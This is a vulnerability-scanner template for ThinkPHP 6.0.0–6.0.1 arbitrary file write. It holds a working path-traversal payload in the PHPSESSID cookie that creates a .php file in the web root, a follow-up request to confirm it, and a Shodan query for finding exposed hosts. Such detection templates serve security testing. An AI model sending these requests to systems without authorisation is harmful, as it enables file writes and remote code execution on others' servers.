id: thinkphp6-arbitrary-write info: name: ThinkPHP 6.0.0~6.0.1 - Arbitrary File Write author: arliya severity: critical description: | ThinkPHP 6.0.0~6.0.1 is susceptible to remote code execution. An attacker can upload any script file through this vulnerability to realize remote code execution takeover.We inject payload into PHPSESSID. In the buggy version, the payload is url encoded and returned as it is. In the fixed version, the payload is returned as a 32-bit hexadecimal string reference: | - https://community.f5.com/t5/technical-articles/thinkphp-6-0-0-6-0-1-arbitrary-file-write-vulnerability/ta-p/281591 - https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write - https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/thinkphp-v6-file-write.yaml classification: cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: thinkphp product: thinkphp shodan-query: title:"ThinkPHP" tags: thinkphp,file-upload,rce variables: random_filename: "{{to_lower(rand_base(11))}}" http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Cookie: PHPSESSID=/../../../public/{{random_filename}}.php Content-Type: application/x-www-form-urlencoded - | GET /{{random_filename}}.php HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: header_1 words: - "Set-Cookie: PHPSESSID=%2F..%2F..%2F..%2Fpublic%2F{{random_filename}}.php" - type: dsl dsl: - "status_2 == 200" # digest: 4b0a00483046022100fdbacdcc7bea301dfc6fbfd4ddb22b4f58f841114e774642419e12679ef3157e022100e94ccb9fc3d01fcf6537dd3eac67e37c84e546602e201557876eb2c632f20a46:922c64590222798bb761d5b6d8e72950